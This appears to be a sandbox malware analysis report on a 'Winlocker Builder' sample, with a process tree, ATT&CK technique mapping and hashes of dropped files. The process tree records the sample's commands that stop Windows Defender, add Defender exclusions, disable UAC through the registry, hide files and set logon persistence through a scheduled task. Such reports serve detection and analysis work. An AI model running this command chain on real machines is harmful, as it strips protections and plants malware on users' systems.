  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5968 /prefetch:1
  2⤵
  PID:4460
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6312 /prefetch:1
  2⤵
  PID:2632
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2076,16534025352252544783,2241950657134302316,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4912 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5780

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3704

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:3684

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2c8 0x4d0
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:216

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5132

C:\Users\Admin\AppData\Local\Temp\Temp1_Winlocker Builder.zip\Winlocker Builder.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Winlocker Builder.zip\Winlocker Builder.exe"
1⤵
- Modifies registry class
PID:5516
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\def.vbs"
  2⤵
  - Checks computer location settings
  PID:5756
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\def.bat" "
    3⤵
    PID:5944
  - - C:\Programdata\Defender\AdvancedRun.exe
      C:\Programdata\Defender\AdvancedRun.exe /EXEFilename "C:\ProgramData\Defender\Windef.bat" /RunAs 8 /Run
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:6032
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\ProgramData\Defender\Windef.bat"
        5⤵
        
        PID:6108
      - C:\Windows\system32\attrib.exe
        
        attrib C:\ProgramData\Defender\*.* -S -H
        6⤵
        Views/modifies file attributes
        
        PID:5156
      - C:\Windows\system32\net.exe
        
        net stop windefend
        6⤵
        
        PID:4648
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop windefend
        7⤵
        
        PID:5240
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData\Defender" /t REG_DWORD /d 0 /f
        6⤵
        Windows security bypass
        
        PID:5204
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v C:\ProgramData\Defender /t REG_DWORD /d 0 /f
        6⤵
        Windows security bypass
        
        PID:5252
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
        6⤵
        
        PID:2164
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v ServiceKeepAlive /t REG_DWORD /d 0 /f
        6⤵
        
        PID:3592
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
        6⤵
        
        PID:5196
      - C:\Windows\system32\reg.exe
        
        REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v EnableLUA /t REG_DWORD /d 0 /f
        6⤵
        UAC bypass
        
        PID:5052
      - C:\ProgramData\Defender\Windows Process.exe
        
        "Windows Process.exe"
        6⤵
        Executes dropped EXE
        
        PID:1864
      - C:\Windows\system32\attrib.exe
        
        attrib C:\ProgramData\Defender\*.* +S +H
        6⤵
        Sets file to hidden
        Views/modifies file attributes
        
        PID:4712
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\ProgramData\Defender\task.vbs"
  2⤵
  - Checks computer location settings
  PID:5788
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Defender\task.bat" "
    3⤵
    PID:5960
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC ONLOGON /TN "Windows Process" /TR "C:\ProgramData\Defender\Windows Process.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:6060
- C:\ProgramData\Defender\builder #6.exe
  "C:\ProgramData\Defender\builder #6.exe"
  2⤵
  - Executes dropped EXE
  - Modifies registry class
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SetWindowsHookEx
  PID:5832

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5688

C:\Windows\SysWOW64\DllHost.exe
C:\Windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
1⤵
PID:5936

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Defender\AdvancedRun.exe

Filesize
88KB

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\ProgramData\Defender\AdvancedRun.exe

Filesize
88KB

MD5
17fc12902f4769af3a9271eb4e2dacce

SHA1
9a4a1581cc3971579574f837e110f3bd6d529dab

SHA256
29ae7b30ed8394c509c561f6117ea671ec412da50d435099756bbb257fafb10b

SHA512
036e0d62490c26dee27ef54e514302e1cc8a14de8ce3b9703bf7caf79cfae237e442c27a0edcf2c4fd41af4195ba9ed7e32e894767ce04467e79110e89522e4a

Download Submit
C:\ProgramData\Defender\Windef.bat

Filesize
850B

MD5
539624878920e20a1091423169ebf205

SHA1
31ee7b3330ee2820e9ff59a43680332d2bd74cf3

SHA256
d12e787d7a2dd3e95176f9c802ea163bfb822b2692c2e1c0417dc948ab2bea59

SHA512
f81f57319f9d5001eeb6c3384b4f8bc7a55238f4bcd13c63bcba36e0aa4ea4441d5ae042d934873e24ce14b17d84fba8eba1dcecadf80d311c0985c2242189c2

Download Submit
C:\ProgramData\Defender\Windows Process.exe

Filesize
2.7MB

MD5
79fd150b489f9037a805dc95b61477ce

SHA1
67ca8b4dae6cebf07163f2d72ea6b1a07f0f3e9d

SHA256
4b25b65c396259af51466308fe0049ef74fe71d8f212bbb30094a29928b99cd7

SHA512
dde5da413268e37a120a9f2be6e72dd60959836f626b60d3b986ba9ea4d96b38e5e487e6ba3af90805f58c0405e1deefea54200fb40dcccbfd7ace62bf4e1e25

Download Submit
C:\ProgramData\Defender\Windows Process.exe

Filesize
2.7MB

MD5
79fd150b489f9037a805dc95b61477ce

SHA1
67ca8b4dae6cebf07163f2d72ea6b1a07f0f3e9d

SHA256
4b25b65c396259af51466308fe0049ef74fe71d8f212bbb30094a29928b99cd7

SHA512
dde5da413268e37a120a9f2be6e72dd60959836f626b60d3b986ba9ea4d96b38e5e487e6ba3af90805f58c0405e1deefea54200fb40dcccbfd7ace62bf4e1e25

Download Submit
C:\ProgramData\Defender\builder #6.exe

Filesize
2.4MB

MD5
9729d33f5cc788e9c1930bcc968acffa

SHA1
68c662875f7b805dd6f246919d406c8d92158073

SHA256
3711a334cb3c6e2a92461067f2d7db2946e9b139f1517b214bc929ba42a86aae

SHA512
af12beee6da79e5498eb292eb4a122667bf5dcdf840def97a5476adb31e0701a2aa0585b4266547bb4307c3524c7f9733dbf32f2a87c87b33fadb4bb1ecd0c3f

Download Submit
C:\ProgramData\Defender\builder #6.exe

Filesize
2.4MB

MD5
9729d33f5cc788e9c1930bcc968acffa

SHA1
68c662875f7b805dd6f246919d406c8d92158073

SHA256
3711a334cb3c6e2a92461067f2d7db2946e9b139f1517b214bc929ba42a86aae

SHA512
af12beee6da79e5498eb292eb4a122667bf5dcdf840def97a5476adb31e0701a2aa0585b4266547bb4307c3524c7f9733dbf32f2a87c87b33fadb4bb1ecd0c3f

Download Submit
C:\ProgramData\Defender\builder #6.exe

Filesize
2.4MB

MD5
9729d33f5cc788e9c1930bcc968acffa

SHA1
68c662875f7b805dd6f246919d406c8d92158073

SHA256
3711a334cb3c6e2a92461067f2d7db2946e9b139f1517b214bc929ba42a86aae

SHA512
af12beee6da79e5498eb292eb4a122667bf5dcdf840def97a5476adb31e0701a2aa0585b4266547bb4307c3524c7f9733dbf32f2a87c87b33fadb4bb1ecd0c3f

Download Submit
C:\ProgramData\Defender\def.bat

Filesize
114B

MD5
60fea9afcb42632be259c70c5cfc429f

SHA1
76c0828379319b713a3f701222c4553bb864c0ee

SHA256
18812a1f3bbbef42fa25ac81fe4e39d5590be8cfbf97e4ae416f6027d3a2b42e

SHA512
b4e60f66b642f371be0a3c4ba65b20847e7a5ae4922755cfaa59225d791c85715a7e11d18e034a0d4092c8bea4ad4d0f2bc2a58f2534309a923ed20aad709099

Download Submit
C:\ProgramData\Defender\def.vbs

Filesize
115B

MD5
dab45db6177acb1d9ffdcbedd8b9c0c1

SHA1
de3351571105a438f08094254f829d5556c5fc6a

SHA256
21e6eccf9f1157968d5a2af8b1749ad29d51926d6533b956a109a31aae7eff1c

SHA512
3a4f474edc44e4da7f1da62d57256fa1c2a877e28f0271e10a35dfd2844822bfd4f842c1be29b8654ffdcfe600c5d56b34ad0ad1f5d8471b9f30af6be314a3ca

Download Submit
C:\ProgramData\Defender\task.bat

Filesize
114B

MD5
6e6498a81838ebe6ffb75280de32947f

SHA1
1db785ef3820ac415403d00132a48564b45fddd9

SHA256
93ca3d9d5c2f06c14eed5d31e2565b941a942062541e2f8b3fbd1664b2568985

SHA512
38b068ca17b21c7518f87dbaf78f08925158fb89c3ffc5935cf32feb654712815cc7928313379c594d6d16078f88deaadce945a96b21abb6ee43dda414455e7e

Download Submit
C:\ProgramData\Defender\task.vbs

Filesize
116B

MD5
9cf7240fdb96cf831e91be32fda66d43

SHA1
f3165c9bbd99a2793fe681a46b3d279770cdaaf1

SHA256
c60b180fa2cc7584c8565a7e1ded518bb771365d6ce8d8330c8219d7ae710f40

SHA512
d6ca89c07e2a693a44ec54dfdbc87471dcab5f4f781241404a71b4802e4f1235070388aeb37dcc6af82dbb82d8a340074c87ae231423e3a32e1eaaf964f0b947

Download Submit
C:\Programdata\Defender\AdvancedRun.cfg

Filesize
630B

MD5
ad0a8e3a63f65974b697d95678632387

SHA1
804b3549e10314cd54468c0a7009ffd68054ca9a

SHA256
05e53388a711e114c5855141fb118da614405c92a578dc0ee260fb0ac537c87d

SHA512
1b0d2b14df39be69e8aa2e06b2c07cfd94fd38f4729fa4f4268d0da243c49eb6316b872307049d3572e4f8ed4ab696140465b6b8a14a1615367909a5046a6fab

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat

Filesize
152B

MD5
3d8f4eadb68a3e3d1bf2fa3006af5510

SHA1
d5d8239ec8a3bf5dadf52360350251d90d9e0142

SHA256
85a80218f4e5b578993436a6b8066b60508dd85a09579a4cb6757c2f9550d96c

SHA512
554773c4edd8456efaa23ac24970af5441e307424de3d2f41539c2cf854d57e7f725bf0c9986347fd3f2ff43efc8f69fd73c5d773bbfd504a99daca2b272a554

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
72B

MD5
25c345d3f1577e112e004679385897ac

SHA1
69392c004971dacfaf100942f8a6fad53d33481c

SHA256
ad9fc02cce744a344d12f946c55651e3098647b860dc63dc4959aa6809dd0fbe

SHA512
a8a90218037500491a495bb0147c9e1c7ac926a7438348d59169e3d645323ab539a45f64415111a8c5dbf1c39efd56600669c66c7cba5fac76b3b71f1761354f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\File System\000\t\Paths\CURRENT

Filesize
16B

MD5
46295cac801e5d4857d09837238a6394

SHA1
44e0fa1b517dbf802b18faf0785eeea6ac51594b

SHA256
0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443

SHA512
8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
111B

MD5
285252a2f6327d41eab203dc2f402c67

SHA1
acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6

SHA256
5dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026

SHA512
11ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

Filesize
188B

MD5
03da8e9f1c34251a6a9fc171f9972a58

SHA1
4817ec312c6bd1ce48635f652f4ea8d70a190987

SHA256
08bfcc15479ee1cf404d6d0c9aa3a5a1eba16288f4e432b56b66861d88052451

SHA512
d8df733d82c529cf321cb5ac9db4216b32b6b6904201207600fec3fcd26c92e550520335e02ff423747d3772ab672ad95528f8bc4a15bd70abf6421d6e0ac727

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
b645892e9791628c765c145f9b45ebad

SHA1
199de394deda4864e8938accacbadfaf36fa0d0a

SHA256
6725661cc300e7064b826a2acac509f0a15f9a5e5b6239cff7814ff04f2e5914

SHA512
867a4e8a6abc1b41316ec3a7d0f94ac77f3147d4b3eeed4f6b4b14e0ffbc51ea59da12939a2bf6a2278b46eeb891e7b4445dc7a465274ab83c62b5cc360f4343

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
5KB

MD5
28a46ed5c2f9c81f0a1ca4d67629eaca

SHA1
750a950f827c34a5883a3839e4233f99d2ee1900

SHA256
924e1c8109b943ba801727d6b96f0d9cbe5cda741579f7077f7d3bb62e869c48

SHA512
b133f1dbbdf10d2bd25694b4edf3485161e49a1839a234a6516659255ae6f71a39d83ec9c2d6938f7e4b47494568fbf1477c269261adbc6e191962484885f791

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
82501b00b98af8445390f29411260c71

SHA1
4d6dbebc3f08c791dced7df47e563d37dde8a040

SHA256
7d92c0dde958a7b990855929b11c6162ce085d05f0bd886e60435501ca7111b8

SHA512
5bc33032bb64f1b5ef8057064e8fef8557308b1fa3d2d519d82a46c9d6f9222a750d7f72bec3b23e2bc8a1c7338c70b6028c93fef8722010a31c3f32bd36a914

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

Filesize
6KB

MD5
5077597a9ad1f08f51e326aa858e924d

SHA1
13b4c77def8e72dcf00ce51fbb704903633ec6fc

SHA256
69ed146e48975777167e7094325ba4ce412d42e5d795fb17cab2cbf6f04ff69e

SHA512
5461a54d4c92cf9c05688fe391986aee4b65bf96aa963cd5249b6cd669c9cde2f04deebce5eea8dfe4728bced76e8a16b82cc453705e8a6bacf85a857eadf936

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

Filesize
24KB

MD5
d985875547ce8936a14b00d1e571365f

SHA1
040d8e5bd318357941fca03b49f66a1470824cb3

SHA256
8455a012296a7f4b10ade39e1300cda1b04fd0fc1832ffc043e66f48c6aecfbf

SHA512
ca31d3d6c44d52a1f817731da2e7ac98402cd19eeb4b48906950a2f22f961c8b1f665c3eaa62bf73cd44eb94ea377f7e2ceff9ef682a543771344dab9dbf5a38

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Filesize
41B

MD5
5af87dfd673ba2115e2fcf5cfdb727ab

SHA1
d5b5bbf396dc291274584ef71f444f420b6056f1

SHA256
f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4

SHA512
de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index

Filesize
72B

MD5
4e62398b6bacb17a3ac3df51f643c4ec

SHA1
cacf23667f60751c1d13cd3f504846cb15461146

SHA256
87873a19cd0203b8b56278b6d2669fbaac048074deb906863514e4843b4614bc

SHA512
75c099f2ff16f2676cd3d5c1f368a0e440eb62e8f084c4659b624a9ce72d9686895bd99ba3e00914e349ebee1cde7edbf8ef31a12fe35acfb48440c791bf303c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RFe587bc3.TMP

Filesize
48B

MD5
8ec2cac88e8c46061b871ea86e468614

SHA1
eff1561f98cd758a28192c07ebf1aa771fa67e05

SHA256
f43db6d56159d961c1c9e5ff9701390ff951b70cb6128ec57b0d677ecb35c88c

SHA512
baeaf73afbcb0a2fb40433c37851285f7ede9a71f4c99a1a0d9b426fa95c7e10c29f0472b9a4d92142d54cbc76c5e7d4471256f1e579e00cbf55c4091399fb7c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT

Filesize
16B

MD5
6752a1d65b201c13b62ea44016eb221f

SHA1
58ecf154d01a62233ed7fb494ace3c3d4ffce08b

SHA256
0861415cada612ea5834d56e2cf1055d3e63979b69eb71d32ae9ae394d8306cd

SHA512
9cfd838d3fb570b44fc3461623ab2296123404c6c8f576b0de0aabd9a6020840d4c9125eb679ed384170dbcaac2fa30dc7fa9ee5b77d6df7c344a0aa030e0389

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
8735d472664f274a8cc12df60e30dcff

SHA1
ea17301b17d187e607b262d1470bdae22a418fee

SHA256
9d606de45d4902afbd366325394e652e8bdf59e085c421e8c03f34fa6bd00110

SHA512
a060ade15e7ee9cc29bc3a5c053584caf7f16f1370818864324545e2dbe166df08ad3ac7bac5decb002195cf5e3b244daa976971fde09ffa8cb0894959b9fe80

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
c3d5b4d25af4c2f88cc83a3f8a8b8dd9

SHA1
2dcb2cf197bdbbe055b8b8a3179068a763b90b97

SHA256
ca7f8caf1e9675609087e8100744a8c37342396967b04b795ab0ca67d53f14cc

SHA512
18955700c851e7e8b09bc198942beaa85c327698c7d513d83e82b5eab1eeb01889a2da23fc780613e97d6c952e13ee103b186e18129996edbc7094dd1de18dac

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State

Filesize
10KB

MD5
6dcfb7c0f38e1c98795c3b8e41239021

SHA1
95863297d39bb9488d3695572ff829f379b4b10d

SHA256
28da1d57987ef432506fc3a92fd989a056b39bde9210bbb0fb68cea49e338027

SHA512
df22c17985392ca8fc099314219dbab13bcf12c7aa9a49e849950c87a7274fe52fad06424875b67be7f54066376468a5a5026f2813bfacf7b03db840a1a7679e

Download Submit
C:\Users\Admin\Desktop\Trojan.exe

Filesize
436KB

MD5
ee7faaf88401d2e778a2bcec23368144

SHA1
f0ca057cb7d4e3f1f9d1d7e814681ca6ef5e3ed0

SHA256
c81ef41512c08b5211a0e0e69e57893e6b03a9232db11c6ce93d2c69a516eaaf

SHA512
5ee8e59ccc630cbef82d32fd926ed26118c8277370d7a095a20832be7ffb3aa4f76a959bf538b77e4bbec26b5a311e27ebd7f639837afeabb50dce97d7d8d901

Download Submit
C:\Users\Admin\Downloads\Winlocker Builder.zip

Filesize
2.4MB

MD5
404732a1761769ef3495f9482001bb11

SHA1
758d16ba86a0fa7c3f9d450759ef30be6641cca3

SHA256
4dd9d0011672cd7bc43fdf97147cdada902048d6d6ebdebc478e2d377de48b36

SHA512
6f833adf6208520cdbb45bf916a92a39f05e2e95c201d5388abbfbcd7e07fa9ffe8c5050a5854e88a88c9c9238475488e271060273b7b4d33e4b76a79ab9bd5c

Download Submit
memory/1864-270-0x00000000009D0000-0x00000000009D1000-memory.dmp

Filesize
4KB

Download
memory/5832-290-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-295-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-289-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/5832-325-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-326-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-327-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-337-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-258-0x00000000021F0000-0x00000000021F1000-memory.dmp

Filesize
4KB

Download
memory/5832-339-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download
memory/5832-359-0x0000000000400000-0x0000000000671000-memory.dmp

Filesize
2.4MB

Download